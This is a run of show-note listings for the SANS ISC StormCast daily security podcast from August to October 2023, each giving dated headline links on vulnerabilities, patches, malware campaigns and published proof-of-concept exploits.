Adventures in Validating IPv4 Addresses https://isc.sans.edu/forums/diary/Adventures%20in%20Validating%20IPv4%20Addresses/30348/
BIG-IP Configuration Utility Unauthenticated Remote Code Execution https://my.f5.com/manage/s/article/K000137353 https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
iLeakage Vulnerability https://ileakage.com/
10/27/2023, 6 minutes, 3 seconds

ISC StormCast for Thursday, October 26th, 2023

Apple Updates https://isc.sans.edu/diary/Apple%20Patches%20Everything.%20Releases%20iOS%2017.1%2C%20MacOS%2014.1%20and%20updates%20for%20older%20versions%20fixing%20exploited%20vulnerability/30344
Confluence Server Scans CVE-2023-22515 https://isc.sans.edu/diary/30342
Critical VMware vCenter Patch CVE-2023-34048 https://www.vmware.com/security/advisories/VMSA-2023-0023.html
10/26/2023, 6 minutes, 6 seconds

ISC StormCast for Wednesday, October 25th, 2023

Samsung Messages and Samsung Wallet briefly marked as 'harmful' by Google https://9to5google.com/2023/10/23/samsung-messages-wallet-harmful-app-google/
OAuth Hijacking https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts
Microsoft Exchange Server CVE-2023-36745 PoC https://n1k0la-t.github.io/2023/10/24/Microsoft-Exchange-Server-CVE-2023-36745/
Citrix Bleed PoC CVE-2023-4966 https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
VMware vRealize Exploit CVE-2023-34051 CVE-2023-34052 https://www.vmware.com/security/advisories/VMSA-2023-0021.html
10/25/2023, 6 minutes, 24 seconds

ISC StormCast for Tuesday, October 24th, 2023

Apple TV IPv6 DoS https://isc.sans.edu/diary/How%20an%20AppleTV%20may%20take%20down%20your%20%28%23IPv6%29%20network/30336
Squid Patches https://github.com/squid-cache/squid/security/advisories
Critical Citrix Update https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/
Cisco Vulnerability Updates CVE-2023-20198 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
10/24/2023, 6 minutes, 24 seconds

ISC StormCast for Monday, October 23rd, 2023

base64dump.py Handles More Encodings Than Just BASE64 https://isc.sans.edu/diary/base64dump.py%20Handles%20More%20Encodings%20Than%20Just%20BASE64/30332
Stealing OAuth Tokens via Open Redirects https://eval.blog/research/microsoft-account-token-leaks-in-harvest/
VMware Patches https://www.vmware.com/security/advisories.html
SolarWinds Patches https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-1_release_notes.htm
10/23/2023, 6 minutes, 39 seconds

ISC StormCast for Friday, October 20th, 2023

Honeypot Update https://github.com/DShield-ISC/dshield/blob/main/README.md
Malicious KeePass Ads https://www.malwarebytes.com/blog/threat-intelligence/2023/10/clever-malvertising-attack-uses-punycode-to-look-like-legitimate-website
Malicious JavaScript in Smart Contracts https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
10/20/2023, 6 minutes, 37 seconds

ISC StormCast for Thursday, October 19th, 2023

Hiding in Hex https://isc.sans.edu/diary/Hiding%20in%20Hex/30322
Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2023.html
Citrix Vulnerability Exploited CVE-2023-4966 https://www.mandiant.com/resources/blog/remediation-netscaler-adc-gateway-cve-2023-4966
Exposed Jupyter Notebooks Exploited https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/
10/19/2023, 5 minutes, 41 seconds

ISC StormCast for Wednesday, October 18th, 2023

Changes to SMS Delivery and How it Affects MFA and Phishing https://isc.sans.edu/diary/Changes%20to%20SMS%20Delivery%20and%20How%20it%20Effects%20MFA%20and%20Phishing/30320
Fake Traffic Tickets with QR Code https://twitter.com/polizeiberlin/status/1713867011837567411
Synology NAS DSM Account Takeover: Not Random Random Numbers https://claroty.com/team82/research/synology-nas-dsm-account-takeover-when-random-is-not-secure
Milesight Routers CVE-2023-43261 https://github.com/win3zz/CVE-2023-43261
10/18/2023, 6 minutes, 46 seconds

ISC StormCast for Tuesday, October 17th, 2023

Are Typos Still Relevant As An Indicator of Phishing? https://isc.sans.edu/diary/Are+typos+still+relevant+as+an+indicator+of+phishing/30316
Active Exploitation of Cisco IOS XE Software Web Management User Interface Vulnerability https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
Mail traffic to cancelled domain names https://www.sidn.nl/en/nl-domain-name/mail-traffic-to-cancelled-domain-names
Samba Update https://www.samba.org/samba/history/security.html
10/17/2023, 5 minutes, 28 seconds

ISC StormCast for Monday, October 16th, 2023

What's Normal: Odd MAC Addresses https://isc.sans.edu/forums/diary/What's%20Normal%3A%20MAC%20Addresses/30310/
Domain Name Used as Password Captured by DShield Sensor https://isc.sans.edu/forums/diary/Domain%20Name%20Used%20as%20Password%20Captured%20by%20DShield%20Sensor/30312/
PoC Exploit for CVE-2023-41993 https://github.com/po6ix/POC-for-CVE-2023-41993
AvosLocker Ransomware Details https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf
DarkGate Spreading via Skype and Teams https://www.trendmicro.com/en_ph/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html
10/16/2023, 5 minutes, 25 seconds

ISC StormCast for Friday, October 13th, 2023

SeroXen RAT in Typosquatted NuGet Packages https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/
Hexadecimal IP Addresses https://asec.ahnlab.com/en/57635/
Juniper Vulnerabilities https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&numberOfResults=50&f:ctype=[Security%20Advisories]
Unpatched Squid Vulnerabilities https://joshua.hu/squid-security-audit-35-0days-45-exploits
BSides Jacksonville https://bsidesjax.org
10/13/2023, 6 minutes, 13 seconds

ISC StormCast for Thursday, October 12th, 2023

CVE-2023-22515 Actively Exploited https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html
curl SOCKS5 oversized hostname vulnerability CVE-2023-38545 https://isc.sans.edu/diary/CVE-2023-38545%3A%20curl%20SOCKS5%20oversized%20hostname%20vulnerability.%20How%20bad%20is%20it%3F/30304
Adobe Acrobat Vulnerability Actively Exploited CVE-2023-21608 https://www.cisa.gov/news-events/alerts/2023/10/10/cisa-adds-five-known-vulnerabilities-catalog
Google Makes Passkey the Default https://blog.google/technology/safety-security/passkeys-default-google-accounts/
VBScript Deprecated from Windows https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features
10/12/2023, 5 minutes, 28 seconds

ISC StormCast for Wednesday, October 11th, 2023

HTTP/2 Rapid Reset https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/
Microsoft Patch Tuesday https://isc.sans.edu/diary/October%202023%20Microsoft%20Patch%20Tuesday%20Summary/30300
10/11/2023, 7 minutes, 55 seconds

ISC StormCast for Tuesday, October 10th, 2023

ZIP's DOSTIME and DOSDATE Formats https://isc.sans.edu/diary/ZIP%27s%20DOSTIME%20%26%20DOSDATE%20Formats/30296
New Magecart Campaign Abusing 404 Pages https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer
Sophos Affected by Exim Flaw https://www.sophos.com/en-us/security-advisories/sophos-sa-20231005-exim-vuln
Turn OFF This WatchGuard Feature: GuardLapse https://projectblack.io/blog/turn-off-this-watchguard-feature-guardlapse/
10/10/2023, 5 minutes, 23 seconds

ISC StormCast for Monday, October 9th, 2023

Binary IPv6 Address Conversion https://isc.sans.edu/diary/Binary%20IPv6%20Addresses/30290
Wireshark Updates https://www.wireshark.org/
Improved GitHub Secret Scanning https://github.blog/2023-10-04-introducing-secret-scanning-validity-checks-for-major-cloud-services/
Prerooted Android Devices https://arstechnica.com/security/2023/10/thousands-of-android-devices-come-with-unkillable-backdoor-preinstalled/
curl update https://github.com/curl/curl/discussions/12026
10/9/2023, 6 minutes, 11 seconds

ISC StormCast for Friday, October 6th, 2023

New tool: le-hex-to-ip.py https://isc.sans.edu/diary/New%20tool%3A%20le-hex-to-ip.py/30284
Cisco Emergency Responder Static Credentials Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cer-priv-esc-B9t3hqk9
Looney Tunables PoC CVE-2023-4911 https://haxx.in/files/gnu-acme.py
Malicious Python Packages https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/
Supermicro BMC Vulnerability https://binarly.io/posts/Binarly_REsearch_Uncovers_Major_Vulnerabilities_in_Supermicro_BMCs/index.html
10/6/2023, 5 minutes, 23 seconds

ISC StormCast for Thursday, October 5th, 2023

Normal Connections https://isc.sans.edu/diary/Whats+Normal+Connection+Sizes/30278/
Apple Patches https://isc.sans.edu/diary/Apple%20fixes%20vulnerabilities%20in%20iOS%20and%20iPadOS./30280
Looney Tunables Linux Privilege Escalation https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so
Atlassian Confluence Server Vulnerability https://jira.atlassian.com/browse/CONFSERVER-92475
10/5/2023, 5 minutes, 30 seconds

ISC StormCast for Wednesday, October 4th, 2023

Are Local LLMs Useful in Incident Response? https://isc.sans.edu/diary/Are%20Local%20LLMs%20Useful%20in%20Incident%20Response%3F/30274
PyTorch Vulnerability https://github.com/advisories/GHSA-4mqg-h5jf-j9m7
Bing Reads Captchas https://twitter.com/literallydenis/status/1708283962399846459
EvilProxy vs. Microsoft 365 https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
10/4/2023, 5 minutes, 36 seconds

ISC StormCast for Tuesday, October 3rd, 2023

Friendly Reminder: ZIP Metadata is Not Encrypted https://isc.sans.edu/diary/Friendly%20Reminder%3A%20ZIP%20Metadata%20is%20Not%20Encrypted/30268
Exim New Version Released https://www.exim.org/static/doc/security/CVE-2023-zdi.txt
Mali GPU Kernel Driver Allows Improper GPU Memory Processing Operations https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities
Bing AI Serves Malicious Ads https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot
Google Announces Robots.txt Ad-Restrictions https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers#adsbot-mobile-web-android
10/3/2023, 5 minutes, 41 seconds

ISC StormCast for Monday, October 2nd, 2023

Analyzing MIME Files: a Quick Tip https://isc.sans.edu/diary/Analyzing%20MIME%20Files%3A%20a%20Quick%20Tip/30266
Infostealers Looking for Password Files https://isc.sans.edu/diary/Are+You+Still+Storing+Passwords+In+Plain+Text+Files/30262/
Simple Netcat Backdoor https://isc.sans.edu/diary/Simple+Netcat+Backdoor+in+Python+Script/30264/
Exim Response to the ZDI Release https://exim.org/static/doc/security/CVE-2023-zdi.txt
Exploit for WS_FTP Vulnerability https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044
10/2/2023, 5 minutes, 9 seconds

ISC StormCast for Friday, September 29th, 2023

IPv4 Addresses in Little Endian Decimal Format https://isc.sans.edu/diary/IPv4%20Addresses%20in%20Little%20Endian%20Decimal%20Format/30256
Chrome Update fixes 0-day Vulnerability https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_27.html
Unpatched Exim Vulnerabilities https://www.zerodayinitiative.com/advisories/ZDI-23-1469/
WS_FTP Vulnerabilities https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023
9/29/2023, 4 minutes, 46 seconds

ISC StormCast for Thursday, September 28th, 2023

GPU Side-Channel Attack https://www.hertzbleed.com/gpu.zip/GPU-zip.pdf
Router Firmware Compromised for Persistent Access https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csa-cyber-report-sept-2023 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a
More libwebp vulnerability confusion https://www.cve.org/CVERecord?id=CVE-2023-5129 https://arstechnica.com/security/2023/09/google-quietly-corrects-previously-submitted-disclosure-for-critical-webp-0-day/
Fake Dependabot Commits https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
9/28/2023, 6 minutes, 56 seconds

ISC StormCast for Wednesday, September 27th, 2023

A new spin on the ZeroFont phishing technique https://isc.sans.edu/diary/A%20new%20spin%20on%20the%20ZeroFont%20phishing%20technique/30248
macOS Sonoma Updates https://isc.sans.edu/diary/Apple%20Releases%20MacOS%20Sonoma%20Including%20Numerous%20Security%20Patches/30252
9/27/2023, 6 minutes, 31 seconds

ISC StormCast for Tuesday, September 26th, 2023

LuaJIT Malware https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/
npm systeminformation flaw https://systeminformation.io/security.html
TeamCity Authentication Bypass https://twitter.com/ptswarm/status/1706223917008834748
9/26/2023, 5 minutes, 6 seconds

ISC StormCast for Monday, September 25th, 2023

Scanning for Laravel - a PHP Framework for Web Artisans https://isc.sans.edu/forums/diary/Scanning%20for%20Laravel%20-%20a%20PHP%20Framework%20for%20Web%20Artisants/30242/
Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/
Unmasking a Sophisticated Phishing Campaign That Targets Hotel Guests https://www.akamai.com/blog/security-research/sophisticated-phishing-campaign-targeting-hospitality
BSides JAX October 14th https://www.bsidesjax.org/ tickets: https://www.eventbrite.com/e/bsides-jacksonville-2023-registration-566463807497?aff=oddtdtcreator
9/25/2023, 7 minutes, 8 seconds

ISC StormCast for Friday, September 22nd, 2023

Apple Patches Three 0-Days https://isc.sans.edu/diary/Apple+Patches+Three+New+0Day+Vulnerabilities+Affecting+iOSiPadOSwatchOSmacOS/30238
WebP Vulnerability https://blog.isosceles.com/the-webp-0day/
MOVEit Transfer Service Pack https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-September-2023
Improved Passkey Support in Windows 11 https://www.microsoft.com/en-us/security/blog/2023/09/21/new-microsoft-security-tools-to-protect-families-and-businesses/
9/22/2023, 6 minutes, 3 seconds

ISC StormCast for Thursday, September 21st, 2023

What's Normal: DNS TTL Values https://isc.sans.edu/forums/diary/What's%20Normal%3F%20DNS%20TTL%20Values/30234/
CISA Highlights Snatch Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a
npm packages caught exfiltrating Kubernetes config, SSH keys https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys
Nagios XI Vulnerabilities https://outpost24.com/blog/nagios-xi-vulnerabilities/
9/21/2023, 5 minutes, 58 seconds

ISC StormCast for Wednesday, September 20th, 2023

Obfuscated Scans For Older Adobe Experience Manager Vulnerabilities https://isc.sans.edu/diary/Obfuscated%20Scans%20for%20Older%20Adobe%20Experience%20Manager%20Vulnerabilities/30230
Trend Micro Apex One 0-day https://success.trendmicro.com/dcx/s/solution/000294994?language=en_US
SprySOCKS Backdoor https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html
GitLab Patches https://about.gitlab.com/releases/2023/09/18/security-release-gitlab-16-3-4-released/
9/20/2023, 5 minutes, 23 seconds

ISC StormCast for Tuesday, September 19th, 2023

Internet Wide Multi VPN Search from Single /24 Network https://isc.sans.edu/diary/Internet%20Wide%20Multi%20VPN%20Search%20From%20Single%20%2024%20Network/30226
iOS/iPadOS/tvOS/WatchOS Updates https://support.apple.com/en-us/HT201222
Juniper Vuln Details/Exploit CVE-2023-36845 https://vulncheck.com/blog/juniper-cve-2023-36845
9/19/2023, 5 minutes, 26 seconds

ISC StormCast for Monday, September 18th, 2023

When MFA isn't actually MFA https://retool.com/blog/mfa-isnt-mfa/
QNAP Patches https://www.qnap.com/en/security-advisories?ref=security_advisory_details
Chrome able to use Apple Keychain Passkeys https://9to5google.com/2023/09/14/chrome-118-icloud-passkey/
Fortinet XSS https://fortiguard.fortinet.com/psirt/FG-IR-23-106
vBulletin XSS https://gist.github.com/GiongfNef/8fe658dce4c7fcf3a7b4e6387e50141c
9/18/2023, 5 minutes, 47 seconds

ISC StormCast for Friday, September 15th, 2023

DShield and qemu Sitting in a Tree: L-O-G-G-I-N-G https://isc.sans.edu/diary/DShield%20and%20qemu%20Sitting%20in%20a%20Tree%3A%20L-O-G-G-I-N-G/30216
Uncursing the ncurses memory corruption vulnerabilities https://www.microsoft.com/en-us/security/blog/2023/09/14/uncursing-the-ncurses-memory-corruption-vulnerabilities-found-in-library/
Arbitrary code execution via Windows Themes (CVE-2023-38146) https://exploits.forsale/themebleed/
3AM Ransomware used if LockBit Fails https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
9/15/2023, 5 minutes, 37 seconds

ISC StormCast for Thursday, September 14th, 2023

Backdoored Free Download Manager https://securelist.com/backdoored-free-download-manager-linux-malware/110465/
Foxit PDF Reader Updates https://www.foxit.com/support/security-bulletins.html
macOS MetaStealer: New Family of Obfuscated Go Infostealers https://www.sentinelone.com/blog/macos-metastealer-new-family-of-obfuscated-go-infostealers-spread-in-targeted-attacks/
Windows 11 to Support Blocking SMB NTLM Hashes https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb-ntlm-blocking-now-supported-in-windows-insider/ba-p/3916206
9/14/2023, 5 minutes, 42 seconds

ISC StormCast for Wednesday, September 13th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20September%202023%20Patch%20Tuesday/30214
OpenSSL 1.1.1 End of Life https://www.openssl.org/blog/blog/2023/09/11/eol-111/
Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
9/13/2023, 5 minutes, 58 seconds

ISC StormCast for Tuesday, September 12th, 2023

Apple Patches Older Operating Systems https://isc.sans.edu/diary/Apple%20fixes%200-Day%20Vulnerability%20in%20Older%20Operating%20Systems/30210
Wi-Fi Enabled Practical Keystroke Eavesdropping https://arxiv.org/pdf/2309.03492.pdf
Phishing via Google Looker Studio https://blog.checkpoint.com/security/phishing-via-google-looker-studio
HPE One View Authentication Bypass https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04530en_us
9/12/2023, 5 minutes, 52 seconds

ISC StormCast for Monday, September 11th, 2023

Augmenting Honeypot Logs https://isc.sans.edu/diary/%3FAnyone%20get%20the%20ASN%20of%20the%20Truck%20that%20Hit%20Me%3F!%3F%3A%20Creating%20a%20PowerShell%20Function%20to%20Make%203rd%20Party%20API%20Calls%20for%20Extending%20Honeypot%20Information%20%5BGuest%20Diary%5D/30204
More details about Apple 0-day https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Remote Access VPN Unauthorized Access Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ravpn-auth-8LyfCkeC#fs
Odd Password Solution https://notpickard.com/@rdp/111009868239846779
9/11/2023, 6 minutes, 50 seconds

ISC StormCast for Friday, September 8th, 2023

Apple Patches 0-Days https://isc.sans.edu/diary/30200 https://support.apple.com/en-us/HT201222
iOS Fleezeware/Scareware https://isc.sans.edu/diary/Fleezeware%20Scareware%20Advertised%20via%20Facebook%20Tags%3B%20Available%20in%20Apple%20App%20Store/30198
Aruba Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-014.txt
TP Link Vulnerabilities https://jvn.jp/en/vu/JVNVU99392903/
9/8/2023, 5 minutes, 7 seconds

ISC StormCast for Thursday, September 7th, 2023

Security Related DNS Records https://isc.sans.edu/diary/Security%20Relevant%20DNS%20Records/30194
Microsoft Reveals Details about Key Loss https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/
September Android Updates https://source.android.com/docs/security/bulletin/2023-09-01
Google Chrome Update https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop.html
Atlas VPN Tunnel Termination Vulnerability https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
9/7/2023, 5 minutes, 43 seconds

ISC StormCast for Wednesday, September 6th, 2023

Common Usernames Submitted to Honeypots https://isc.sans.edu/diary/Common%20usernames%20submitted%20to%20honeypots/30188
TPM LUKS Bypass https://pulsesecurity.co.nz/advisories/tpm-luks-bypass
Cross Tenant Impersonation Prevention and Detection https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
9/6/2023, 5 minutes, 34 seconds

ISC StormCast for Tuesday, September 5th, 2023

What is the Origin of Passwords Submitted to Honeypots https://isc.sans.edu/diary/What%20is%20the%20origin%20of%20passwords%20submitted%20to%20honeypots%3F/30182
Creating a YARA Rule to Detect Obfuscated Strings https://isc.sans.edu/diary/Creating%20a%20YARA%20Rule%20to%20Detect%20Obfuscated%20Strings/30186
VMware Aria Operations for Networks Hardcoded Keys CVE-2023-34039 https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/ https://github.com/sinsinology/CVE-2023-34039/
Windows will Disable TLS 1.0/1.1 https://learn.microsoft.com/en-us/windows/release-health/windows-message-center
9/5/2023, 6 minutes, 17 seconds

ISC StormCast for Friday, September 1st, 2023

The low, low cost of (committing) cybercrime https://isc.sans.edu/forums/diary/The%20low%2C%20low%20cost%20of%20%28committing%29%20cybercrime/30176/
Unpinnable GitHub Actions https://www.paloaltonetworks.com/blog/prisma-cloud/unpinnable-actions-github-security/
Exploitation of Cisco ASA SSL VPNs https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/
Splunk Vulnerabilities https://advisory.splunk.com/advisories
Top Level Domain Issues https://blog.talosintelligence.com/whats-in-a-name/
9/1/2023, 6 minutes, 20 seconds

ISC StormCast for Thursday, August 31st, 2023

Home Office/Small Business Hurricane Prep https://isc.sans.edu/diary/Home%20Office%20%20%20Small%20Business%20Hurricane%20Prep/30166
Notepad++ Vulnerabilities https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/
7-Zip Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-23-1164/
BGP Error Handling Issues https://blog.benjojo.co.uk/post/bgp-path-attributes-grave-error-handling
8/31/2023, 5 minutes, 34 seconds

ISC StormCast for Wednesday, August 30th, 2023

Survival Time for Web Sites https://isc.sans.edu/diary/Survival%20time%20for%20web%20sites/30170
PDF/ActiveMime Polyglot Maldocs https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html https://blog.didierstevens.com/2023/08/29/quickpost-pdf-activemime-maldocs-yara-rule/
RocketMQ Vulnerability Exploited https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability
ManageEngine Vulnerability https://www.manageengine.com/security/advisory/CVE/CVE-2023-35785.html
8/30/2023, 6 minutes, 3 seconds

ISC StormCast for Tuesday, August 29th, 2023

Analysis of RAR Exploit Files (CVE-2023-38831) https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164
Juniper Exploit CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847 https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
Microsoft Will Enable Extended Protection for Exchange Server by Default https://techcommunity.microsoft.com/t5/exchange-team-blog/coming-soon-enabling-extended-protection-on-exchange-server-by/ba-p/3911849
Rust Malware Staged on Crates.io https://blog.phylum.io/rust-malware-staged-on-crates-io/
SANS Community Night London Signup https://www.sans.org/mlp/community-night-cloud-security-london-september-2023
8/29/2023, 6 minutes, 31 seconds

ISC StormCast for Monday, August 28th, 2023

Python Malware Using Postgresql for C2 Communications https://isc.sans.edu/diary/Python%20Malware%20Using%20Postgresql%20for%20C2%20Communications/30158
macOS: Who is Behind This Network Connection? https://isc.sans.edu/diary/macOS%3A%20Who%3Fs%20Behind%20This%20Network%20Connection%3F/30160
CVE-2020-19909 Is Everything that is Wrong with CVEs https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/
Windows Certificate Confusion https://arstechnica.com/security/2023/08/a-renegade-certificate-is-removed-from-windows-then-it-returns-confusion-ensues/
NPM E-Mail Validator Package Malware https://blog.phylum.io/npm-emails-validator-package-malware/
8/28/2023, 6 minutes, 37 seconds

ISC StormCast for Friday, August 25th, 2023

How I made a "QWERTY" Keyboard Walk Password Generator with ChatGPT https://isc.sans.edu/diary/How%20I%20made%20a%20qwerty%20%3Fkeyboard%20walk%3F%20password%20generator%20with%20ChatGPT%20%20%5BGuest%20Diary%5D/30152
FBI Warns of Persistent Barracuda Backdoors https://www.ic3.gov/Media/News/2023/230823.pdf
Ivanti Sentry Authentication Bypass Deep Dive CVE-2023-38035 https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/
Smoke Loader Drops Whiffy Recon WiFi Scanning and Geolocation Malware https://www.secureworks.com/blog/smoke-loader-drops-whiffy-recon-wi-fi-scanning-and-geolocation-malware
8/25/2023, 5 minutes, 52 seconds

ISC StormCast for Thursday, August 24th, 2023

More Exotic Excel Files Dropping AgentTesla https://isc.sans.edu/diary/More%20Exotic%20Excel%20Files%20Dropping%20AgentTesla/30150
CVE-2023-38831 WinRAR Vulnerability Exploited https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
Aruba Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-012.txt
8/24/2023, 5 minutes, 20 seconds

ISC StormCast for Wednesday, August 23rd, 2023

Fernet Encryption in Malware https://isc.sans.edu/forums/diary/Have%20You%20Ever%20Heard%20of%20the%20Fernet%20Encryption%20Algorithm%3F/30146/
Malware Triage With Inotify Tools https://isc.sans.edu/diary/Quick+Malware+Triage+With+Inotify+Tools/30142/
Adobe ColdFusion Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Openfire Admin Console Vulnerability Exploited https://vulncheck.com/blog/openfire-cve-2023-32315
XLoader Mac Malware Updates https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/
8/23/2023, 6 minutes, 2 seconds

ISC StormCast for Tuesday, August 22nd, 2023

SystemBC Scans and ProxyNation https://isc.sans.edu/diary/SystemBC%20Malware%20Activity%20/30138 https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware
Exchange Server Security Update Re-Release https://techcommunity.microsoft.com/t5/exchange-team-blog/re-release-of-august-2023-exchange-server-security-update/ba-p/3900025
Ivanti Sentry Vulnerability Exploited https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US
DUO Security Outage https://status.duo.com/incidents/rw7g0q7ztj8f
mTLS Vulnerabilities https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/
8/22/2023, 6 minutes, 7 seconds

ISC StormCast for Monday, August 21st, 2023

From a Zalando Phish to a RAT https://isc.sans.edu/diary/From%20a%20Zalando%20Phishing%20to%20a%20RAT/30136
RARLAB WinRAR Recovery Volume Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-23-1152/
Hotmail SPF Record Error Leads to spam false positives https://www.bleepingcomputer.com/news/microsoft/hotmail-email-delivery-fails-after-microsoft-misconfigures-dns/
Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/
Google Chrome to Warn Users of Malicious Extensions https://betanews.com/2023/08/17/google-chrome-to-warn-users-about-problematic-extensions/
8/21/2023, 5 minutes, 35 seconds

ISC StormCast for Friday, August 18th, 2023

Command Line Parsing - Are These Really Unique Strings? https://isc.sans.edu/diary/Command%20Line%20Parsing%20-%20Are%20These%20Really%20Unique%20Strings%3F/30126
iOS 16 Fake Airplane Mode https://www.jamf.com/blog/fake-airplane-mode-a-mobile-tampering-technique-to-maintain-connectivity/
LinkedIn Attacks https://cyberint.com/blog/research/linkedin-accounts-under-attack-how-to-protect-yourself/
Robot Vacuum Privacy Issues https://dontvacuum.me/talks/DEFCON31/DEFCON31-vacuum-robots-final.pdf https://dontvacuum.me/
8/18/2023, 5 minutes, 44 seconds

ISC StormCast for Thursday, August 17th, 2023

PowerShell Gallery Prone to Typosquatting, Other Supply Chain Attacks https://www.darkreading.com/application-security/powershell-gallery-prone-to-typosquatting-other-supply-chain-attacks
Windows Random Time Issues https://arstechnica.com/security/2023/08/windows-feature-that-resets-system-clocks-based-on-random-data-is-wreaking-havoc/
Energy Company Targeted in QR Code Campaign https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/
New Citrix Scanner from Mandiant https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner
8/17/2023, 6 minutes, 40 seconds

ISC StormCast for Wednesday, August 16th, 2023

macOS Background Task Manager Bypass https://www.wired.com/story/apple-mac-background-task-management-flaw/
Ivanti Avalanche Vulnerability https://www.tenable.com/security/research/tra-2023-27
Exploiting Synology NAS Cloud Connectivity https://claroty.com/team82/research/a-pain-in-the-nas-exploiting-cloud-connectivity-to-pwn-your-nas-synology-ds920-edition
Fake Crypto Currency Apps Offered as "Beta" versions https://www.ic3.gov/Media/Y2023/PSA230814
8/16/2023, 5 minutes, 53 seconds

ISC StormCast for Tuesday, August 15th, 2023

PDFiD False Positives Revisited https://isc.sans.edu/diary/PDFiD%3A%20False%20Positives%20Revisited/30122
